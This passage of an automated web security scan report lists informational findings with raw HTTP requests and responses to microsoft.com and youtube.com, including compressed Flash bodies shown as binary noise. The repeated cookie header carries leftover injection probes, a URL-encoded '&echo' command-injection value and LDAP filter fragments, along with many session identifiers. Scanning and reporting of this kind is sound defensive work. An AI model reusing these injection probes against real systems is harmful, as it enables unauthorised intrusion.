Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 79197231300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:28:16 GMT
Content-Length: 50759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Microsoft Worldwide Home</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

...[SNIP]...
order="0" hspace="0" vspace="0" src="http://c.microsoft.com/trans_pixel.asp?source=www&amp;TYPE=PV&amp;p=worldwide&amp;URI=%2fworldwide%2fdefault.aspx&amp;GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&amp;r=http%3a%2f%2fwww.microsoft.com%2fworldwide&amp;lc=en-us"></div></layer>
   </body>
</HTML>

Request 2

GET /worldwide/ HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279982831500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:30:01 GMT
Content-Length: 50710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Microsoft Worldwide Home</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

...[SNIP]...
border="0" hspace="0" vspace="0" src="http://c.microsoft.com/trans_pixel.asp?source=www&amp;TYPE=PV&amp;p=worldwide&amp;URI=%2fworldwide%2fdefault.aspx&amp;GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&amp;lc=en-us"></div></layer>
   </body>
</HTML>

18.14. http://www.youtube.com/v/JmxL5BlVzZQ  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /v/JmxL5BlVzZQ

Request 1

GET /v/JmxL5BlVzZQ?version=3&enablejsapi=1&playerapiid=swfOnboarding&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3225
Content-Type: application/x-shockwave-flash

CWS
....x..WKw......@5...A."%P...&..K"%Q.[`(..eGv............y$.,&+/y.,2........f6.}&>.f..0;..n...X..Cvw..W...Uu.%H.... D`gh..~5.?...U...;{...n..8z2[v..z".h4....i.%Rkkk..bbqq.%........}wv...av.....i..X-.u...l..T....-..,..LgUf8v".O!P....VUu6.ZM..U...\..f...^..MW...DW..8.Gg..%..b{:..-.6....'..K]C7z..r.x..&j.Y...&.\.^..Q....]f.F.87..7E..e..S.._.C.|]5......=ry.c.F.a..u=.Z..-&S)..N}.x..m
.p....'.\E......+.X    ....4vY.XK.>H=._K%S.ed....n6r...8..RH..P].....04*.f.$=.Zw.r..<...hh.m....S...>m:    d.*F.X...4].....q.?}u.m....4X.......E.E..TzE*K=....A..peK.....O.?-1M..N.......\TX#W4......p......Y...N.;.ic....Z.rL5J...l.P..g,..Y.aZzi6....M\..Y.o...........e.}.OZbf......Y..:3..r.fE.(..W.......^Z..A+.D.W..c.Z..'.Z.x......:.'....j.^Y<.Z}...l.,.t.....V..F.)...6....t.P.(..U......,.\...'.Y....i./.....y"8....I;..=.....z...r.S...<.h......Z<..e..g...1|..>d...Cr.....n.T.p.;...1....tS-m........l.Zs./LL%.s.u.....T..MS.I.......v.0.s    v..i...Zd.GjE...Zgu.@...<v..lB...........Z...5.....w.}....B.s.....'8.c.....3..a@k.t.....z........H@'..yr..c....*..W..05<.;..S..2.......................7...C.@h.<..ELdY.<...........(P.(.g.!.s.....q..a....'p..J..[7..N...\N.}F.8......d\...+.P.IG...?$.Cp.h..5}p*...LA.\.m...9..1I..g...j[......$....2..e...N..A...5t..o.G.=2Q.3q.*.......?od.+...<....F.'O..].+.&L...1W..$]M...w...MO0F..SoN;....Q...+........X.M..~).-.~..3>.;p.D....E.c&.*...{.k.]...%.E.../Dw...N1...]vw.yR.?.{...~....". 8...J.,...x+.$.%.;O..T............v..f...r.....A.._.i....zX...+f.a.oU...p...V..+...V.[....!..(vL...v..&>.mn..
7.....b..~S...y.@..5e..r=.a....    t........q.[j..`.....0'/.J)...qv..W..)..eZ....=....Q..t.4u..AO..Tt;..t..e..6...6....&....-..S......+w.{.....p.I=.f....Q.{...t:....C.\....ilv...ix&........{.V...'.F..H.l.....~.(.At.8.c..(.D..'p.u.z......6}.....sW'......{.&.......i.2MG.2G..X.i...*~.d)..L.&
...%.h...=w..'.x.L..Vtx8qRf...r.m.s..y.7..2..s..s9_u..'.=...l.........x....
.w..uFR"...<2..V.v`5SJ.._J..e+X........".J.....3......n6...w\..ENv.?.._~.I...j1ov;......<<.........n.h.0...`..A.0.>.c.#q.i..6.b..i....    i.Mw..
...[SNIP]...

Request 2

GET /v/JmxL5BlVzZQ?version=3&enablejsapi=1&playerapiid=swfOnboarding&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:47 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3211
Content-Type: application/x-shockwave-flash

CWS
....x..WKw............H.2(.bL.x.%..(.-0.A..#.^...=....<3 ...8.....]...H..$.!.l.....d.../......D..C.L........K.....@......|6.G...*i.....eU7.u.=.-;Nm=.h4...R........Dr1......v.p.....3....0.hUjN.4b|.....xv..Z*^.....B..    ..*3.;.....T\.L..:.j..W.*.K\..e.x.P/....v.Q.+.u.......Y`.=.]..b.]}W........=.T.v.hV.5.,..h..P.r.
....z..3k.n..f...K.2E..../..q...gu..m......k.......K-......g..>J...6....O..
.W......J%V...1..]......S...R.Tr...........2.l..R.;T.....0......I.....\)1Ob.%..@..v..T.g.O.N.Y...(....M.....~..O_.h+&.f........F.,..\T......-..O?z/Q...4..;..kg.;.pQa.\..........H~....`.4.t.;b;..;a.U,.T...1.6U.|.bN......f..8...u^......_[YZL..._v....%f.*.....5
.3..).lV4..zwu    .[.........RO...$f...}l.....Y..9..|.a*..........^....rLw..<+m5.m.....j.Y..M.Pd...Z%.L7(.."......vrU....o..+.<.N.Y&s.........Vo..V...1.\....8.;V...u.x..Y?9.o#...._~@.A..;......n.t.5.U.b.n..m.R.......VkN.....r...Q.Y..J..;
8i_.R..N...fa..n.#m.[S...H..\.T....|.....c.M....w>.}..`]+.X.&..b....O.`...x.t..:...x..b..eF.7.h..n.p[.]/..<.9...    ...6ON.sl..=].C.J.....%..E> S...L....-....\I .,....{...<...f.syZ.D.%.../..|..?......2}...8'{L...........r.G.....u....]N....g....h[,.@.........t..
.C.?.w..J]........$.....\.......x.....e..*\.A.X..W(..QF.`..Q..@.]C.{.6z..#..1.... .{.....F....:.s..}n.}.Dz....m.dz..s.    O.....~W./...c.O;....|Z..u._p.e.[.N..Q,..E.....J......m.
"A
....1.u.._......V......c....mW^.........<)...].[q.o.{a.\..QtU%A.x....
.......X..../o..{.b.d;.|3}.N.bw.F. t./.....L=,Yp.......*.yt8i.......w.+.......n..;...j;....6..#....g.p1.}..+xJ....:....^`..20w.....l..G......-..R0.q..9...Y)..s8......./e..L.....g..W7...n...T#.i...n......,.........`.........={.m{.=...{..D.b.3.RCO..7+.w...../..u..../Wf0+l....(d...i.........U...I....2..........
w.]...X.:J9Q5.    .|.....8&..M_>?......'..!s...    y.w...{Z.L....Q..Ug..B.\.<YJ,&...B..c.6...u..w..;.;S.....N..Yo......9r.<..o.....u....:El....d`...ULZ[..@<g.`O...P.:#).o.A...@+z;..).../......S.U....P.g%._....n...Ln7..d.;..."'...g./>.$BvY..7......mo..nmn.X.}.b7{.y..Vk0Gy?{.e.........l.k.p.4..\.....;BO..n.u..KmG.3J<
...[SNIP]...

18.15. http://www.youtube.com/v/LpBCsQQ_v0U&autoplay=1  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /v/LpBCsQQ_v0U&autoplay=1

Request 1

GET /v/LpBCsQQ_v0U&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1133
Content-Type: application/x-shockwave-flash

CWS.5...x..V[s.D.>..H..5iM.I..t`...Ih.J..$f.Kl`.......V..v.D..>..3<.o..+..Ub.....=.o.wV.9.=........;.....+..o..8.....{..[+'..9e+.U.n.$<...Sc\..2..&.3.X.y...d..`$...m..5w...<.xT....~..V.U...6..%g...>.x..:.a..#2..;..r......#..8..kX
.    u-......i. v..#.)5;.AiHL.`.*.G|.J...).........)..m..........VAS..+VH....A..O...}..._..{.....E......>{....x...c..,..k...<"..u.......-6    ..a...MM..3......v.[.^..ys.,>n.{).eD.......H.,.>9.e'.......'....k>.}c>..\^^...N....
.... ..Ch.r......-...._3.C.3./....Q.....F.....v.sC.........%...KX.w'.K"0m.....(...{.95C..?.L:.r.H.c......s`Z.g.t=..f..#.3
..lBY.$......|..1...=&..`.K;."'..4.\&{*V..3..'.\.&......-k.
.K.q.q..78..
\....z.u. ..3q.&
.P...V..,.2E....k ....HM{..
..B!S.B...x...@...........
.D...w.4.Q..`
....._,.4YL.|.S.|......nD...,    ..XWZ.|."V..-R.*Nr.eQ....M1sS.!"Pu
.v..X..@U.K]..#O..Hz.....N......6...-......`........w.S/..m..x....,[...^..\...a...8.*..rN0....y...H..5.R..k.SD*i..p..?..../[|..:/.    P...............X.p. .h..V..^.>L.Q..........)x.y.>.*.(.=Q3.$E.....1t[L[.....E.......o.IZ...+fE...*'..<..f........C.......y.W7......K.^..E(./....>k2.....n...U./..z    ed....~..._O..EXN?P..H.a./.......

Request 2

GET /v/LpBCsQQ_v0U&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:40 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1118
Content-Type: application/x-shockwave-flash

CWS.....x..V[s.D.>..H..5iM.i..t`...Ih.J..M......'.,.e..$.+'...)....~.O.[...b;.~X....\$.........2px...S...0....#.`.X.W...r...S..Qe.VN..:==5.._+.?l20c.._..lN...z.Q..6.Qr.`@.C.G.....7.j.Z.!*n..]rfXA.3...(C...1"....P-WQ.x..<...#;...p.P.2=/)....Kb..8B.R.C.........x.w....
|.b..L....!..p.6.=.L.M.n..
..._.B..x...rT.........h.....7-..].`........c.?...gA.M.Wy......D.l.....$0\.5WjT5.B.L<.2c..1/....a.........W.M..n6.BD....c@..5...6.PW.//_/B'......1....t.-[N..:p...P.y.[.KHe...}..0
X.....t}....{n..8"b2.t......    ..:A[..i.u,v......G^P3t.....C ..D>.z......"8...q.0#'...Q..`... ...pD>l.(...
^L.    .6..3...W....dM.I.`.}....o....D..-k...?.q.q..7x.*..j8..z.u. |..8]..t(..+.O.3...].|...x...iOTPAWZ.d
..^..g`e.d..Y\.].x?...GND[..0.@..u.    .P
\,...
...0X..0.,....8..6@.,......s....)be.."...$.Z.E...\g3.Y.,.Ug.o...%`TE..........w...5n.......A..n.I.-.G.`X......=.:W....9.;.g..d.........wQ........D.s.F#/j.....F^..uCZ
O%.\.........i.o...i5...{... ..^......X..Z.X4_+...~.&.(P..gQ...
....u....J.K.........RNG.....}~.:u.....^...#..E...Y..*...~C.PQ3r...X...!.....5.....~..l...W.x....K[H.Y..tE..v...W...r.%....'K..".~&Y....~..............m

18.16. http://www.youtube.com/v/O3iZU0WCuwc&autoplay=1  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /v/O3iZU0WCuwc&autoplay=1

Request 1

GET /v/O3iZU0WCuwc&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:34 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1124
Content-Type: application/x-shockwave-flash

CWS.....x.}U.r.D..,..rlk..@...t`.vB...JS.$f....
7.YZ.jeIH.8~.z.K.p...U_+..Rb...xV........y.....3....}............<..T....w.v...............xhV.X.g../?.l....F.l.e..,...z.4..Tw.m....fu.z..W...u..=.l.'..0Nl=4...@.\%.7.w....8.|._.....y|.t.i..J..}V.../..A.e%........<......gE".V..p].K..&...h..<z4u......x.3..:....................6.{..mo......Y..u.......C.F.....1.$..."ub_.....;.k*.$:.....N...o."-.........f..._.jMW.c..l...2..T.    p.}.I.CM9??5.V......-]o....fQ..Gq....|.....d>C..m.......>.........Us...\BF.}2...............e.(.]

..T....8....Q......PO.M..o.0.u.....Fh...".<X,..?B.    82.Ud...    
...J....5M.tV.....\.5..T] .....i..Y.B..)...Q.%...uQ.J....^..x+...\..f.@.J........H..&.9.L..T..X.
Mi..)&D...5..$).gi.45/.I.E|r..L..q.y.Q.?".JQ...v. .d.%..&...X..G..2....,H..\..B|."V6......s.g......d.u..$.........p.."Uj    _(
...Ik...c\K.}..\.AMD.....[..&.(..s.r}....T..7.N...5......Im..b..MRU.NM.@tNV8.-..2.sH....    -L..Mi...3RqF.8Q,eD.......y    j..R.].....; .Y..%..I,.<]+...~..yb.......hK....ua.M.J.J{.....D....l1R.OSv..d..X.O.~N.....(.    E.JSU.TQ.+.    .5.4...............NM?..7.......E(.W.m1..|.KS$.l..m1.."..3..%..x...f...G4......K.dFo=......

Request 2

GET /v/O3iZU0WCuwc&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:47 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1111
Content-Type: application/x-shockwave-flash

CWS.....x.}U[s.D..,..rmk..@.:@.....&m...NI.$....^4.......VI...S.=.........]%v...z.......`.!P................$.....v...)..;...`X9r+.o.?~..VK....O......ga...%.Q$.v..0.4...;    ......w...^]..!.e..e...$>.6...`XG}3.....j.J.o..r...I.....s..!..v.........Xi...4H.]...kT......}>0cf....Z.
..y..)...............x.L]...a..Q..%-.`.,.W..).9.7...^...xs..h...O.N.d...i.yt....p^W.3V. ...}QP...t    ...d:.B..yn..a.$....}.[...~..I.S]&.M.EB..@.H .iggg/g.......-.lY.s......%.....92.^.......{A...F...(d.Z../........1...a.G.....\....E...Ftu.(.oQk..V....g.....".J=N7u.~{..h.,.....~".%F...b..#$..#......MP.
X$!8p...(x. .=.+...oc...<...v..ARMhy=U..!N..C..)..Tp.2.t:... ...h>.....
.h.7+...T....f.i..Z....ah.2E%dO.Ff...Ey=Kco.y.O...ONf.i7.#/2....B+
.2..."M..../1..6.:W?...!c..eAZ............Lqie.C>K..D.^.3..."..'./...(.y..t.).p.....h...c\I.}.-\..+S........I2".j.S..].^...j....u..lq<...zs....m...t."....p.X..$.sH....J....SFji..t.1>V...(..f.UQ6/A.x..x...............$.|.>+g}Q......g.gQ.Xk...5.."..D.d....)\.E..T^......}.G6}^..gr?'.7.T[4..*fe....h.%uBM..!..}...]...A....N.f......H....P._qi..}..\.&.f.El.../...QLO.V.s..0;.\>.....%..LKa......

18.17. http://www.youtube.com/v/QO6L5AtZ5kE&autoplay=1  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /v/QO6L5AtZ5kE&autoplay=1

Request 1

GET /v/QO6L5AtZ5kE&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1120
Content-Type: application/x-shockwave-flash

CWS.....x.}U[s.D.>..H..5mM.I..00`'......NH.$.k3Px.....F..v....>..3<.o..+..Ub......{....<.(......;.....`....&...y.[..[....n....3....}\...O.j.....4.....+.%...t...C........`gc.....w6767.E.m.3..[v...`k.e....VB......."........^..........0.;...w....U.I4.x.$"................Uv....%...eu.v>..7.....P......o... ....Ua.2...O.......=b..V....g...k....|.<9..hZ.....Tf. .u.....C#.GXS.F.    @..Q.3n#'.5y/....p.........j..!=gU7....Hh...S..H..4..........._B.....O.KY.vGi..WKF......>.Lf.A.'..I.#>.)...B.....1..$.pz0...$......1.....4..}L
4$..>g$... ..z.i.b......9 6.."~ <.$n:.!g0....'...P....#...NP...DBp.g.iV...,.|.j)).....(?..C/....@...    p...}.!F..m........Q.I.......50.\,....y...Rti.M./#..[..............-...:..7...n.~.C....6..~l.!"..c....X)....&.a../a..m    :.<...A..K...,J.........m..Vy\.#.....^es.. Y..O...w.)....4i(.0.........k...}    .pS.]....$.7$.L.a...`*.....Su..z4es_.,_...YR.....a......
.|Av.`.7...s.    >j../\.....2..i8c~..+9...f......V..5..y.{..C4..cQ....b..Z.rE..0.G.>;=.*.zW:...../s.U.^.{..p..}...f..l>+.......5?..9y^=Tm.d......f.....5=.....%......*.../{..u..l..|v.j./B..biK.>.*..I..n    .bU.+%...q:..x..?.N...p...O.~$...~...w..

Request 2

GET /v/QO6L5AtZ5kE&autoplay=1 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1109
Content-Type: application/x-shockwave-flash

CWS.....x.}U[s.D.>..H...ik.N.....;...d.4uBb&.]....f-.%5.$..$...)....~.O.[.....W.x....w.J.0............../j.....4    .<...z.....?rkv4............q._..t.....=.]X.,.P....u............[.7.~......-.n.......4.....C.........X.....p....7..*.h.8M...X.....z......:L.Q..$.    d.....,F.(t..F.... ..,    ...k..................}s:..i7<:.    .....x.p...h...56.O..>{.s\.....C..Y.D..U]uF.*....M.....F...f.F.1@..q.3n."'.....k..8O.;.~...R.j./!..G"D...vyy..............O.KY.v.i....F......>.Lg.A4 ..I.#>.)...B.....1.rI(.t...q.. -..#..    ..i"].,
4$..>g$...0 ..z.i.b..l.
